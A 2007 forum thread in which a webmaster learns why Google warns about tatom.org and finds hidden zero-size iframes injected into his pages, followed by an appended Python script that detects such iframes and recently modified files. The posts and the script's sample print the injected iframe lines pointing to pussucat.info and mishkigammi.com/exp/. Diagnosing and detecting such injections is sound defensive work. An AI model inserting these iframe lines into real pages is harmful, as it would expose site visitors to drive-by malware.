
StopBadware.org partnership with Google


eclectica
2007-03-04, 17:42
When you conduct a search on the internet using Google you get back results, listing various websites. Google has partnered with a site StopBadware.org, to give you a warning "This site may harm your computer" for some sites. Google "tatom ochy" to see it yourself.

Google explains the following when you click on the link:

Why do some of my search results say "This site may harm your computer?"

This warning message appears with search results that we've identified as sites that may install malicious software on your computer. We want our users to feel safer when they search the web, and we're continuously working to identify such dangerous sites and increase protection for our users.

Malicious software is often installed without your knowledge or permission when you visit these sites. Some examples of malicious software include programs that delete data on your computer, steal personal information such as passwords and credit card numbers, or alter your search results. For more information on these types of sites, please visit http://www.stopbadware.org/home/help

I am the owner of the site tatom.org which is listed there. To my knowledge there is no malware hosted on the site, and there is not even one commercial. I became aware that tatom.org is listed there about a month ago, when StopBadware.org had 7,000 listings in their Badware Website Clearinghouse. Now it has 20,000 listings.

I wrote to StopBadware.org using their Request for Review form (http://www.stopbadware.org/home/review), asking them to tell me specifically what or where they thought the "badware" on tatom.org was. A few weeks later I received an email from Google addressed to the webmaster at tatom.org, which is not the contact email I used for my request for review from StopBadware.org. The email from Google said the following:

Subject: Malware notification regarding tatom.org
From: Google Search Quality

Dear site owner or webmaster of tatom.org,

We recently discovered that some of your pages can cause users to be
infected with malicious software. We have begun showing a warning page
to users who visit these pages by clicking a search result on Google.com.
Below is an example URL on your site which can cause users to be
infected (space inserted to prevent accidental clicking in case your
mail client auto-links URLs):

http://www.tatom .org/

Here is a link to a sample warning page:
http://www.google.com/interstitial?url=http%3A//www.tatom.org/

We strongly encourage you to investigate this immediately to protect
your visitors. Although some sites intentionally distribute malicious
software, in many cases the webmaster is unaware because:

1) the site was compromised
2) the site doesn't monitor for malicious user-contributed content
3) the site displays content from an ad network that has a malicious
advertiser

If your site was compromised, it's important to not only remove the
malicious (and usually hidden) content from your pages, but to also
identify and fix the vulnerability. We suggest contacting your hosting
provider if you are unsure of how to proceed. StopBadware also has a
resource page for securing compromised sites:
http://www.stopbadware.org/home/security

Once you've secured your site, you can request that the warning be
removed by visiting http://www.stopbadware.org/home/review and
requesting a review. StopBadware and Google will jointly investigate
and reply to you with our findings. If your site is no longer harmful
to users, we will remove the warning.

Sincerely,
Google Search Quality Team

Since I received no specific information, there was nothing I could do. The request for review was stonewalled by them. You can also submit a request for review to Google rather than to StopBadware.org. But you have to have a Google Webmaster Tools account with Google, which I didn't want to create.

I am not in the business of making money on the internet, and it doesn't bother me to lose traffic. People on the internet ought to be cautious about how much faith they put into such clumsy solutions. It reminds me of the color codes that Homeland Security uses to show the threat level of a terrorist attack. The inability of StopBadware.org or Google to write back to me telling me specifically where the badware was located on the site, indicates to me that they've lost control of their own project and it has grown too big. It is also useless if they can't tell people specifically where they think there is badware, because there is no specific information provided for the webmasters to fix their own sites.

thediva2
2007-03-08, 04:32
So, what's next? I would barrage them with their response email every day until they answered. Go to war with Google (since you're not going to Iraq). The way they handled this seems to go against their politically correct, we-care-about-everyone image.

eclectica
2007-03-08, 10:52
I could try harder than I have done to actually protest to Google, yet I don't feel the urge to. You see, Google always claims to have a hands-off approach in the interest of fairness. In other words, they don't heed the complaints of people who want search results to be a certain way. People complained that the Google search for "jew" was bringing up, first in the listings, a site called Jew Watch (http://www.jewwatch.com/), and they had an online petition to Google to manually change it. But the Google owners didn't budge and refused to intervene. And things like that give Google more credibility, because one would not want special interests or those who complain the most to affect the search engine results.

But to really be fair, people should render the same unto Google according to its deeds. Since Google is so stubborn as to refuse to manually intervene to alter search results, then people should also be equally stubborn and refuse to correct Google when it fucks up and makes a mistake by blacklisting their sites. They are all doing Google a favor by submitting a request for review. Why should I intervene to save Google from making an ass out of itself?

thediva2
2007-03-09, 12:46
I am not suggesting that you save Google from itself, but rather call them on their bullshit. I'm all for checking people on their bad behavior, but if it's not that important to you, don't do anything.

eclectica
2007-03-24, 07:46
I received an email yesterday from appeals@stopbadware.org. Here is what the email said:

According to our review of your website, your site contains a potentially damaging exploit. For example, the source code for www.tatom.org/ contains the following suspicious code:

<iframe src='http://pussucat.info/count/index.php' width=0 height=0></iframe>

This type of code may allow parties other than yourself to load content onto users' computers via your website. In such a case, simply visiting your site would cause users to become infected by malware, spyware, or other badware that is loaded from a remote site. In addition, the party that placed the code on your site could inject additional code onto your site with potentially undesirable consequences. Even if your site is not currently distributing badware (for example, if the site that the code is pointing to is not currently "live"), your site has the potential to become a distributor of badware at any time due to the exploit noted above. Because of this continuing danger, Google will not be removing the warning page for your site at this time.

We strongly recommend removing any code that is currently or has the potential to distribute badware and securing your site against future code injections. Otherwise, it is likely that your website will be hacked again. If your site has been hacked, then simply removing injected code from your site is not enough. You will also need to work with your hosting provider or website administrator to fix all security vulnerabilities associated with your site.

We have created a webpage that has tips for webmasters on how to clean and secure their websites at http://stopbadware.org/home/security. Please read this page to find out how to find, remove, and prevent badware appearing on your website. We recommend paying special attention to the sections on Hacking Attacks. We also have answers to commonly asked questions from site owners who are the subject of Google warnings at http://stopbadware.org/home/faq#partnerwarnings.

Once you have secured your site, removed any traces of badware or bad code, and discontinued linking to any sites that install badware, you may submit another request for review and we will retest your site.

The StopBadware Team

So I checked http://www.tatom.org/index.html and viewed the source code. I verified that what they said was correct. Here is what I found in the html source code. I indicated in bold gold color the added text, which I never put there:

<html>
<head>
<title>tatom.org</title>
</head><iframe src='http://pussucat.info/count/index.php' width=0 height=0></iframe>
<body bgcolor="#CCBBFF" background="http://www.tatom.org/images/tatom.gif">
<center>
<table width="60%">
<tr>
<td><img src="http://www.tatom.org/images/caution.gif"> <b>YOU CAN RUN, BUT YOU CAN'T HIDE</b> <a href="http://www.tatom.org/Saffronia/"><img src="http://www.tatom.org/images/saff.jpg" border="0" align="bottom"></a>
<hr>
<h2>Pages on this site</h2>
<p><b><a href="http://www.tatom.org/AstaKebe/">Hotel Asta Kebe (Tambacounda, Senegal)</a></b></p>
<p><b><a href="http://www.tatom.org/AbouDia/">Abou Dia Couture</a></b></p>
<p><b><a href="http://www.tatom.org/TNRR/">Tom Rogers's home page</a></b></p>
<p><b><a href="http://www.tatom.org/OchyCuriel/OchyCuriel.html">Ochy Curiel - Marginal</a><br>
<i>complete album lyrics and music to download</i></b></p>
<p><b><a href="http://www.tatom.org/Starclimber/Starclimber.html">Starclimber</a></b></p>
<p><b><a href="http://www.tatom.org/documents/">documents, forum postings, and articles of interest</a></b></p>
<p><b><a href="http://www.tatom.org/archives/">dionysians.org forum archives</a></b></p>
</td>
</tr>
</table>
</center>
</body><iframe src='http://pussucat.info/count/index.php' width=0 height=0></iframe>
</html>

Checking by way of ftp, I observed that the altered index.html file had a date of 2007-01-31 @ 12:08. I checked the file on my personal computer and found it to have a date of 2006-09-12. That was the last time I edited the index.html file on my computer and uploaded it to tatom.org. In cPanel I checked the stats of Webalizer Ftp. There it lists all the ftp activity on the site. For January 2007 it showed visits from two different IP addresses. One was from my own ISP account and the other was from 66.29.89.64. A search on the internet for that IP address leads to spam sites with names such as Asian fuck, Asian movie porn, Kinky Asian, free gay sex movie gallery, gay chat, black cock white, Buy Cialis Online, free femdom vids, vagina cum shot, Slots Machines.

I figure that what happened was that the server cindy.asmallorange.com was exploited somehow and the iframe hack was inserted into the index.html file of tatom.org. It has happened to other sites before, which you can read about at another site:
http://archive.cert.uni-stuttgart.de/suse-security/2004/03/msg00373.html
There are 344 other sites on the server besides tatom.org, and the server could have been exploited from a vulnerability in either something one of the sites was running, or from the server itself. Once the server is hacked, then any of the sites on it can be altered.

After finding the error because StopBadware.org finally emailed me a month and a half later, I was glad I was able to fix the iframe hack. My problem is that they ought to have a quick easy way for people to find out why a site is blacklisted, so that rather than going through a month of waiting for an appeals or inquiry to be answered, a person should find the answer right away in order to identify and fix the problem.

eclectica
2007-03-24, 21:38
I have found another page, besides index.html of tatom.org, that was altered with an iframe exploit.
It occurred to me that the page http://www.tatom.org/documents/CNN.com-StudyNewstudyshows.htm
would be an enviable target due to its popularity. It received 31,000 visits in February 2007. I checked it with Webalizer Ftp and found the vulnerability had been inserted by the same IP address of 66.29.89.64 on 2006-10-01 at 09:30. So I fixed that other problem as well just today.

Here is the iframe exploit that was added to the html document right after the </head> tag:

<iframe src='http://mishkigammi.com/exp/' width=0 height=0></iframe>

I checked my Webalizer Ftp stats for the other months but did not see anything else out of the ordinary.

If you want to check whether any of the html pages on a website of yours have been altered in this manner, view the source code of the web page and then do a search for "iframe".
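The two manual checks described in the last two posts, comparing file dates against your own last upload and searching page source for "iframe", can be scripted over a local copy of the site. The script below is an added example written for this thread; it is not the poster's own procedure and not any tool from StopBadware.org or Google. It flags HTML files whose modification time is later than a known-good upload date (assumed here to be 2006-09-12, the date quoted above) and lists every iframe that is zero-sized, hidden by style, or placed outside <body>, which is exactly where the injected tags in the quoted index.html sit. The sample page, the example.com embed and the timestamps are constructed for the demo.

```python
"""Triage helpers for a site you suspect has been modified behind your back.

Added example for this thread, not the poster's own procedure or any
StopBadware/Google tooling. Two checks the posts above do by hand:
  1. which HTML files were modified after your own last upload, and
  2. which <iframe> elements are hidden (zero size, display:none) or sit
     outside <body>, where no hand-written page puts them.
The sample page and timestamps below are constructed for the demo.
"""
import calendar
import os
import re
import tempfile
from html.parser import HTMLParser

# Constructed sample shaped like the injected index.html quoted in the thread:
# a zero-size iframe after </head> and another after </body>, plus one
# ordinary embed inside the body (example.com is a placeholder) that must
# not be flagged.
SAMPLE_HTML = """<html>
<head><title>tatom.org</title></head><iframe src='http://pussucat.info/count/index.php' width=0 height=0></iframe>
<body>
<p>Pages on this site</p>
<iframe src="https://example.com/embed" width="640" height="360"></iframe>
</body><iframe src='http://pussucat.info/count/index.php' width=0 height=0></iframe>
</html>
"""

# Assumed "last time I uploaded index.html myself" (2006-09-12 in the thread).
KNOWN_GOOD = calendar.timegm((2006, 9, 12, 0, 0, 0))


class IframeFinder(HTMLParser):
    """Record every <iframe>: its line, attributes, and whether it is inside <body>."""

    def __init__(self):
        super().__init__()
        self.in_body = False
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag == "body":
            self.in_body = True
        elif tag == "iframe":
            self.iframes.append({"line": self.getpos()[0],
                                 "attrs": dict(attrs),
                                 "in_body": self.in_body})

    def handle_endtag(self, tag):
        if tag == "body":
            self.in_body = False


def _is_zero(value):
    """True for width/height values like 0 or 0px."""
    return value is not None and re.fullmatch(r"\s*0(px)?\s*", value, re.I) is not None


def suspicious_iframes(html):
    """Return (line, src, reasons) for each iframe that is hidden or misplaced."""
    parser = IframeFinder()
    parser.feed(html)
    parser.close()
    findings = []
    for frame in parser.iframes:
        attrs = frame["attrs"]
        reasons = []
        if not frame["in_body"]:
            reasons.append("outside <body>")
        if _is_zero(attrs.get("width")) and _is_zero(attrs.get("height")):
            reasons.append("zero size")
        style = (attrs.get("style") or "").replace(" ", "").lower()
        if "display:none" in style or "visibility:hidden" in style:
            reasons.append("hidden by style")
        if reasons:
            findings.append((frame["line"], attrs.get("src", ""), reasons))
    return findings


def files_modified_after(root, epoch, suffixes=(".html", ".htm")):
    """Paths under root whose modification time is later than epoch (your last upload)."""
    hits = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            if name.lower().endswith(suffixes):
                path = os.path.join(dirpath, name)
                if os.path.getmtime(path) > epoch:
                    hits.append(path)
    return sorted(hits)


def demo():
    """Build a throwaway site copy, run both checks, and return the findings."""
    with tempfile.TemporaryDirectory() as root:
        clean = os.path.join(root, "clean.html")
        hacked = os.path.join(root, "index.html")
        with open(clean, "w") as fh:
            fh.write("<html><body><p>untouched</p></body></html>\n")
        with open(hacked, "w") as fh:
            fh.write(SAMPLE_HTML)
        # clean.html predates the last upload; index.html is dated ~2007-01-31
        os.utime(clean, (KNOWN_GOOD - 86400, KNOWN_GOOD - 86400))
        os.utime(hacked, (KNOWN_GOOD + 141 * 86400, KNOWN_GOOD + 141 * 86400))
        modified = [os.path.basename(p) for p in files_modified_after(root, KNOWN_GOOD)]
        with open(hacked) as fh:
            frames = suspicious_iframes(fh.read())
    return {"modified": modified, "iframes": frames}


if __name__ == "__main__":
    result = demo()
    print("modified after known-good upload:", result["modified"])
    for line, src, reasons in result["iframes"]:
        print(f"line {line}: {src} ({', '.join(reasons)})")
```

Run it against a fresh download of the site rather than the live server: FTP timestamps are only as trustworthy as the server, and an attacker with write access can also reset them, so the iframe scan is the check that does not depend on dates. Placement outside <body> is flagged on its own because that is how the injected tags in the quoted page were inserted (right after </head> and after </body>), regardless of their size.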